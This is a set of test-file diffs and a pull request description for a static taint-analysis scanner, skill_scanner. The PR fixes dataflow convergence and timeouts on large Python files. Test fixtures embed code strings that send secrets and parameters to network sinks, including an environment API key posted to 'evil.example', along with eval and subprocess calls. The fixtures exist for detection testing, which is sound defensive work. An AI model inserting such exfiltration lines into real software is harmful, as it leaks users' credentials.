+    def test_nested_loops(self):
+        code = (
+            "import requests\n"
+            "def nested(secret):\n"
+            "    data = secret\n"
+            "    for i in range(10):\n"
+            "        for j in range(10):\n"
+            "            data = data + str(i) + str(j)\n"
+            "            requests.get('http://x/' + data)\n"
+            "    return data\n"
+        )
+        self._assert_stable_and_tracks(code, "secret")
+
+    def test_try_except(self):
+        code = (
+            "import requests\n"
+            "def guarded(user_input):\n"
+            "    try:\n"
+            "        data = user_input + 'p'\n"
+            "        requests.post('http://x/', data=data)\n"
+            "    except Exception:\n"
+            "        requests.get('http://fallback/' + user_input)\n"
+            "    return user_input\n"
+        )
+        self._assert_stable_and_tracks(code, "user_input")
+
+    def test_comprehension(self):
+        code = (
+            "import requests\n"
+            "def comp(secret):\n"
+            "    items = [secret + str(i) for i in range(5)]\n"
+            "    requests.get('http://x/' + items[0])\n"
+            "    return items\n"
+        )
+        self._assert_stable_and_tracks(code, "secret")
+
+    def test_multiple_sinks(self):
+        code = (
+            "import subprocess\n"
+            "import requests\n"
+            "def multi(param):\n"
+            "    data = param\n"
+            "    subprocess.run(['echo', data])\n"
+            "    requests.get('http://x/' + data)\n"
+            "    eval(data)\n"
+            "    return data\n"
+        )
+        self._assert_stable_and_tracks(code, "param")
+
+    @pytest.mark.xfail(reason="ast.AugAssign (+=, -=, ...) is not handled in _transfer_python — pre-existing gap")
+    def test_augmented_assignment_propagates_taint(self):
+        """Documents a known gap: augmented assignment (`acc += user_input`) is not
+        tracked, so the tainted parameter records no assignment flow. A plain
+        `acc = acc + user_input` would. Will pass once AugAssign is handled."""
+        code = (
+            "import requests\n"
+            "def f(user_input):\n"
+            "    acc = 'prefix:'\n"
+            "    acc += user_input\n"
+            "    requests.get('http://x/' + acc)\n"
+            "    return acc\n"
+        )
+        flows = _run(code, ["user_input"], detect_sources=False)
+        assert any(f.parameter_name == "user_input" and f.reaches_assignments for f in flows)
+
+
+class TestIncompleteAnalysisIsSurfaced:
+    """An early-stopped analysis must be visible to the user, not silent."""
+
+    def test_context_extractor_propagates_incomplete_flag(self):
+        """extract_context must set dataflow_incomplete when the budget trips."""
+        original = ForwardDataflowAnalysis.max_analysis_seconds
+        try:
+            ForwardDataflowAnalysis.max_analysis_seconds = 0.0  # trip at the first clock check
+            ctx = ContextExtractor().extract_context(Path("big.py"), _looping_function(60))
+            assert ctx.dataflow_incomplete is True
+        finally:
+            ForwardDataflowAnalysis.max_analysis_seconds = original
+
+        # A small, fully-analyzable script is not flagged.
+        ctx_ok = ContextExtractor().extract_context(Path("ok.py"), "def f(x):\n    return x + 1\n")
+        assert ctx_ok.dataflow_incomplete is False
+
+    def test_behavioral_analyzer_emits_info_finding_when_incomplete(self):
+        analyzer = BehavioralAnalyzer()  # no LLM/alignment by default
+
+        incomplete_ctx = SkillScriptContext(file_path="big.py", functions=[], imports=[], dataflow_incomplete=True)
+        findings = analyzer._generate_findings_from_context(incomplete_ctx, None)
+        incomplete = [f for f in findings if f.rule_id == _INCOMPLETE_RULE_ID]
+        assert len(incomplete) == 1, "an incomplete analysis must produce exactly one notice finding"
+        assert incomplete[0].severity == Severity.INFO, "the notice must not inflate severity"
+
+        complete_ctx = SkillScriptContext(file_path="ok.py", functions=[], imports=[], dataflow_incomplete=False)
+        assert not [
+            f for f in analyzer._generate_findings_from_context(complete_ctx, None) if f.rule_id == _INCOMPLETE_RULE_ID
+        ], "a complete analysis must not produce the incomplete notice"

--- a/tests/behavioral/test_dataflow_performance.py
+++ b/tests/behavioral/test_dataflow_performance.py
@@ -308,7 +308,10 @@ class TestDataflowEdgeCasesStillAnalyze:
         )
         self._assert_stable_and_tracks(code, "param")
 
-    @pytest.mark.xfail(reason="ast.AugAssign (+=, -=, ...) is not handled in _transfer_python — pre-existing gap")
+    @pytest.mark.xfail(
+        strict=True,
+        reason="ast.AugAssign (+=, -=, ...) is not handled in _transfer_python — pre-existing gap",
+    )
     def test_augmented_assignment_propagates_taint(self):
         """Documents a known gap: augmented assignment (`acc += user_input`) is not
         tracked, so the tainted parameter records no assignment flow. A plain

--- a/tests/behavioral/test_dataflow_performance.py
+++ b/tests/behavioral/test_dataflow_performance.py
@@ -1,0 +1,130 @@
+# Copyright 2026 Cisco Systems, Inc. and its affiliates
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+"""Regression tests for behavioral-analysis dataflow performance (issue #120).
+
+Large, deeply-looping Python files used to make the forward-dataflow fixpoint
+run for many minutes (deep-copying the whole taint state on every node visit),
+so behavioral analysis appeared to hang and was killed by an outer 360s timeout.
+
+These tests pin the two fixes:
+  * copy-on-write taint environments must not leak mutations across copies, and
+    must keep analysis of large looping functions fast; and
+  * the fixpoint must honor a wall-clock budget and degrade gracefully (return
+    partial results, flag them incomplete) instead of hanging.
+"""
+
+import time
+
+from skill_scanner.core.static_analysis.dataflow import ForwardDataflowAnalysis
+from skill_scanner.core.static_analysis.parser.python_parser import PythonParser
+from skill_scanner.core.static_analysis.taint.tracker import ShapeEnvironment, Taint, TaintStatus
+
+
+def _looping_function(n_loops: int) -> str:
+    """A function with `n_loops` sequential loops that each mutate a tainted
+    accumulator — the control-flow shape that drove the issue's blowup."""
+    lines = ["def handler(user_input, mode):", "    acc = user_input + os.getenv('TOKEN')"]
+    for j in range(n_loops):
+        lines.append(f"    for i{j} in range(mode):")
+        lines.append(f"        acc = acc + str(i{j}) + user_input")
+        lines.append("        requests.get('http://x/' + acc)")
+    lines.append("    eval(acc)")
+    lines.append("    return acc")
+    return "\n".join(lines) + "\n"
+
+
+class TestTaintEnvironmentCopyOnWrite:
+    """ShapeEnvironment.copy() shares shapes but must isolate writes."""
+
+    def test_mutating_copy_does_not_affect_original(self):
+        env = ShapeEnvironment()
+        env.set_taint("x", Taint(status=TaintStatus.TAINTED, labels={"param:x"}))
+
+        clone = env.copy()
+        # Overwrite x in the clone; original must keep its original taint.
+        clone.set_taint("x", Taint(status=TaintStatus.UNTAINTED))
+
+        assert env.get_taint("x").is_tainted() is True
+        assert clone.get_taint("x").is_tainted() is False
+
+    def test_new_variable_in_copy_does_not_leak_back(self):
+        env = ShapeEnvironment()
+        clone = env.copy()
+        clone.set_taint("y", Taint(status=TaintStatus.TAINTED, labels={"param:y"}))
+
+        # 'y' exists only in the clone.
+        assert clone.get_taint("y").is_tainted() is True
+        assert env.get_taint("y").is_tainted() is False
+
+
+class TestDataflowStaysCorrect:
+    """The performance fixes must not change analysis findings."""
+
+    def test_taint_flow_still_detected(self):
+        code = (
+            "import os\n"
+            "import requests\n"
+            "def f(token):\n"
+            "    secret = os.getenv('API_KEY')\n"
+            "    data = token + secret\n"
+            "    requests.post('http://evil.example/', data=data)\n"
+            "    return data\n"
+        )
+        parser = PythonParser(code)
+        parser.parse()
+        analyzer = ForwardDataflowAnalysis(parser, parameter_names=["token"], detect_sources=True)
+        flows = analyzer.analyze_forward_flows()
+
+        # The tracked parameter still produces a flow path...
+        assert any(f.parameter_name == "token" for f in flows), "parameter flow should still be tracked"
+        # ...the credential source is still detected...
+        assert any(f.parameter_name.startswith("env_var:") for f in flows), "env var source should be detected"
+        # ...and a tainted value still reaches an external network sink.
+        assert any(f.reaches_external for f in flows), "external sink should still be detected"
+
+
+class TestDataflowPerformanceAndGracefulDegradation:
+    """Large looping functions must analyze quickly and never hang."""
+
+    def test_large_looping_function_completes_quickly(self):
+        """Regression guard: this used to be super-linear. Should be well under
+        the per-unit time budget on any normal machine."""
+        parser = PythonParser(_looping_function(40))
+        parser.parse()
+        analyzer = ForwardDataflowAnalysis(parser, parameter_names=["user_input", "mode"])
+
+        start = time.perf_counter()
+        analyzer.analyze_forward_flows()
+        elapsed = time.perf_counter() - start
+
+        assert elapsed < 20.0, f"dataflow analysis too slow ({elapsed:.1f}s) — perf regression"
+
+    def test_time_budget_bounds_runtime_and_flags_incomplete(self):
+        """A pathological function with a tight budget must stop early, flag the
+        result incomplete, and still return the flows found so far."""
+        parser = PythonParser(_looping_function(400))
+        parser.parse()
+        analyzer = ForwardDataflowAnalysis(parser, parameter_names=["user_input", "mode"])
+        analyzer.max_analysis_seconds = 2.0
+
+        start = time.perf_counter()
+        flows = analyzer.analyze_forward_flows()
+        elapsed = time.perf_counter() - start
+
+        assert elapsed < 10.0, f"time budget did not bound runtime ({elapsed:.1f}s)"
+        assert analyzer.analysis_incomplete is True, "partial analysis should be flagged incomplete"
+        assert isinstance(flows, list), "partial results should still be returned"

--- a/tests/behavioral/test_dataflow_performance.py
+++ b/tests/behavioral/test_dataflow_performance.py
@@ -310,6 +310,20 @@ class TestIncompleteAnalysisIsSurfaced:
         ctx_ok = ContextExtractor().extract_context(Path("ok.py"), "def f(x):\n    return x + 1\n")
         assert ctx_ok.dataflow_incomplete is False
 
+    def test_function_context_propagates_incomplete_flag(self):
+        """The per-function path (_analyze_parameter_flows) must also surface the
+        flag onto SkillFunctionContext when the budget trips."""
+        original = ForwardDataflowAnalysis.max_analysis_seconds
+        try:
+            ForwardDataflowAnalysis.max_analysis_seconds = 0.0
+            fctxs = ContextExtractor().extract_function_contexts(Path("big.py"), _looping_function(60))
+            assert any(c.dataflow_incomplete for c in fctxs)
+        finally:
+            ForwardDataflowAnalysis.max_analysis_seconds = original
+
+        ok = ContextExtractor().extract_function_contexts(Path("ok.py"), "def f(x):\n    return x + 1\n")
+        assert not any(c.dataflow_incomplete for c in ok)
+
     def test_behavioral_analyzer_emits_info_finding_when_incomplete(self):
         analyzer = BehavioralAnalyzer()  # no LLM/alignment by default
 

--- a/tests/static_analysis/test_dataflow_convergence.py
+++ b/tests/static_analysis/test_dataflow_convergence.py
@@ -84,6 +84,25 @@ class TestTaintEquality:
         assert ShapeEnvironment() != object()
         assert TaintShape() != object()
 
+    def test_copy_is_isolated_via_set_taint(self):
+        """copy() shares TaintShape objects (copy-on-write), but writing through
+        the sanctioned set_taint() path must not leak into the source. This
+        pins the COW invariant the forward-dataflow analysis relies on: mutate
+        only via set_taint(), read only via get()."""
+        original = ShapeEnvironment()
+        original.set_taint("x", Taint(status=TaintStatus.TAINTED, labels={"param:x"}))
+
+        clone = original.copy()
+        assert clone == original
+
+        # Mutate the clone through the sanctioned write path.
+        clone.set_taint("x", Taint(status=TaintStatus.UNTAINTED))
+
+        # Source is untouched; the two now differ.
+        assert original.get_taint("x").is_tainted()
+        assert not clone.get_taint("x").is_tainted()
+        assert clone != original
+
 
 # A synthetic file large enough that spinning to the iteration cap would take
 # many seconds, but which converges almost instantly once a fixpoint is
@@ -122,5 +141,9 @@ class TestLargeFileConvergence:
         # that still catches a regression to the non-converging code path.
         assert elapsed < 15.0, f"extract_context took {elapsed:.1f}s -- fixpoint likely not converging"
 
-        # Sanity: analysis still produced a real context (subprocess imported).
+        # Sanity: analysis produced a real parsed/extracted context, not the
+        # parse-failure fallback (which would also set file_path). Assert on
+        # analysis-specific output instead.
         assert context.file_path == "large_skill.py"
+        assert len(context.functions) == 1
+        assert "subprocess" in context.imports

--- a/tests/static_analysis/test_dataflow_convergence.py
+++ b/tests/static_analysis/test_dataflow_convergence.py
@@ -1,0 +1,126 @@
+# Copyright 2026 Cisco Systems, Inc. and its affiliates
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+"""
+Tests for dataflow fixpoint convergence on large files (Issue #120).
+
+The CFG worklist algorithm stops when a node's out-fact stops changing.
+That comparison runs through ``ForwardFlowFact.__eq__`` which delegates to
+``ShapeEnvironment.__eq__`` / ``TaintShape.__eq__``. Those types previously
+had no ``__eq__``, so freshly-copied environments always compared unequal by
+identity. The fixpoint was therefore never detected and the analysis spun
+until the iteration safety cap -- which is catastrophically slow on large
+files (a ~2,400-line file took >70s and the wrapping process timed out).
+
+These tests pin the value-equality semantics and guard against the
+performance regression returning.
+"""
+
+import time
+
+from skill_scanner.core.static_analysis.context_extractor import ContextExtractor
+from skill_scanner.core.static_analysis.taint.tracker import (
+    ShapeEnvironment,
+    Taint,
+    TaintShape,
+    TaintStatus,
+)
+
+
+class TestTaintEquality:
+    """Value-equality semantics required for fixpoint convergence."""
+
+    def test_empty_environments_are_equal(self):
+        assert ShapeEnvironment() == ShapeEnvironment()
+
+    def test_copied_environment_equals_original(self):
+        env = ShapeEnvironment()
+        env.set_taint("x", Taint(status=TaintStatus.TAINTED, labels={"param:x"}))
+        assert env == env.copy()
+
+    def test_environments_with_different_taint_differ(self):
+        a = ShapeEnvironment()
+        a.set_taint("x", Taint(status=TaintStatus.TAINTED, labels={"param:x"}))
+        b = ShapeEnvironment()
+        b.set_taint("x", Taint(status=TaintStatus.UNTAINTED))
+        assert a != b
+
+    def test_environments_with_different_vars_differ(self):
+        a = ShapeEnvironment()
+        a.set_taint("x", Taint(status=TaintStatus.TAINTED))
+        b = ShapeEnvironment()
+        b.set_taint("y", Taint(status=TaintStatus.TAINTED))
+        assert a != b
+
+    def test_taintshape_equality_is_by_content(self):
+        s1 = TaintShape(taint=Taint(status=TaintStatus.TAINTED, labels={"l"}))
+        s2 = TaintShape(taint=Taint(status=TaintStatus.TAINTED, labels={"l"}))
+        assert s1 == s2
+        assert s1 == s1.copy()
+
+    def test_taintshape_nested_fields_compared(self):
+        s1 = TaintShape()
+        s1.set_field("a", Taint(status=TaintStatus.TAINTED))
+        s2 = TaintShape()
+        s2.set_field("a", Taint(status=TaintStatus.TAINTED))
+        assert s1 == s2
+        s2.set_field("a", Taint(status=TaintStatus.UNTAINTED))
+        assert s1 != s2
+
+    def test_equality_with_other_type_is_false(self):
+        assert ShapeEnvironment() != object()
+        assert TaintShape() != object()
+
+
+# A synthetic file large enough that spinning to the iteration cap would take
+# many seconds, but which converges almost instantly once a fixpoint is
+# detected. Mirrors the structure (deep branching + loops) of the file in the
+# original report without vendoring it.
+def _build_large_source(num_blocks: int = 200) -> str:
+    lines = ["import os", "import subprocess", ""]
+    lines.append("def handler(arg):")
+    lines.append("    result = arg")
+    for i in range(num_blocks):
+        lines.append(f"    if result == {i}:")
+        lines.append(f"        tmp_{i} = result + {i}")
+        lines.append(f"        for j in range({i % 5}):")
+        lines.append(f"            tmp_{i} = tmp_{i} + j")
+        lines.append(f"        result = tmp_{i}")
+        lines.append("    else:")
+        lines.append(f"        result = result - {i}")
+    lines.append("    return result")
+    return "\n".join(lines) + "\n"
+
+
+class TestLargeFileConvergence:
+    """Large files must converge quickly, not spin to the iteration cap."""
+
+    def test_large_file_analyzes_quickly(self):
+        source = _build_large_source(num_blocks=200)
+        assert source.count("\n") > 1000  # genuinely large
+
+        extractor = ContextExtractor()
+        start = time.time()
+        context = extractor.extract_context("large_skill.py", source)
+        elapsed = time.time() - start
+
+        # With convergence working this finishes in well under a second.
+        # The pre-fix behavior took tens of seconds; 15s is a generous ceiling
+        # that still catches a regression to the non-converging code path.
+        assert elapsed < 15.0, f"extract_context took {elapsed:.1f}s -- fixpoint likely not converging"
+
+        # Sanity: analysis still produced a real context (subprocess imported).
+        assert context.file_path == "large_skill.py"


### PR DESCRIPTION
## Description

Behavioral analysis (`--use-behavioral`) hangs on large Python files (~2,000+ lines) and is killed by the caller's 360s `subprocess.TimeoutExpired` (issue #120). The cost is entirely in the static **forward-dataflow** stage — no code is executed; the subprocess timeout is an outer wrapper killing a slow child.

This PR combines two complementary fixes:

### 1. Root cause — the fixpoint never converged (this branch)

The CFG worklist decides it has reached a fixpoint when a node's out-fact stops changing. That check runs through `ForwardFlowFact.__eq__` → `ShapeEnvironment.__eq__` / `TaintShape.__eq__`. **Those types had no `__eq__`, so they compared by object identity.** Because the transfer function always returns a freshly-copied fact, two structurally identical facts always compared unequal, so the fixpoint was never detected and the analysis spun until the iteration safety cap (`CFG_nodes × 300` ≈ 640k iterations on the repro file).

Fix: add content-based `__eq__` to `ShapeEnvironment` and `TaintShape`. This changes only **when** the loop stops, never the values it computes — the facts at the cap were already the converged values.

### 2. Performance + graceful degradation (incorporates #129 by @rohitgollarahalli)

- **Copy-on-write taint environments** — `copy()` shares `TaintShape` objects and clones lazily on write, instead of deep-copying every shape per node visit.
- **Memoized name lookups** in `_expr_uses_var()`.
- **Wall-clock budget** (`max_analysis_seconds`, default 30s) as a backstop, with an `analysis_incomplete` flag surfaced into the report so a truncated scan is never mistaken for a clean one.

These are synergistic: COW makes `copy()` cheap, and content-based `__eq__` short-circuits on shared shapes (dict `==` compares identity first), so equality is fast precisely because shapes are shared.

## Results (repro file from the issue, 2,454 lines)

| | main | #129 alone | this PR |
|---|---|---|---|
| Time | >360s (killed) | 30.1s (hits budget) | **0.20s** |
| Outcome | timeout | truncated (`incomplete=True`, 0 flows) | **converges, complete** |

Verified on **39 real skills** (anthropics/skills, obra/superpowers, anthropics/claude-cookbooks): findings **byte-identical** to `main`, total behavioral time 21.4s → 0.4s.

## Type of Change

- [x] Bug fix (non-breaking)
- [x] Performance improvement

## Related Issues

Closes #120. Incorporates and supersedes #129 (its commits are included here).




<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Dataflow analysis now enforces a wall-clock time budget, stopping gracefully and returning partial results when needed.
  * Incomplete analysis is surfaced to users via informational notices and clearer prompt guidance, avoiding misinterpretation of missing evidence.

* **Bug Fixes**
  * Improved determinism and stability of analysis outputs across runs.
  * Fixed taint-state copy behavior so mutations no longer leak between analysis runs.
  * Improved fixpoint convergence for complex inputs.

* **Tests**
  * Added regression coverage for performance, determinism, and graceful degradation when analysis is truncated.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->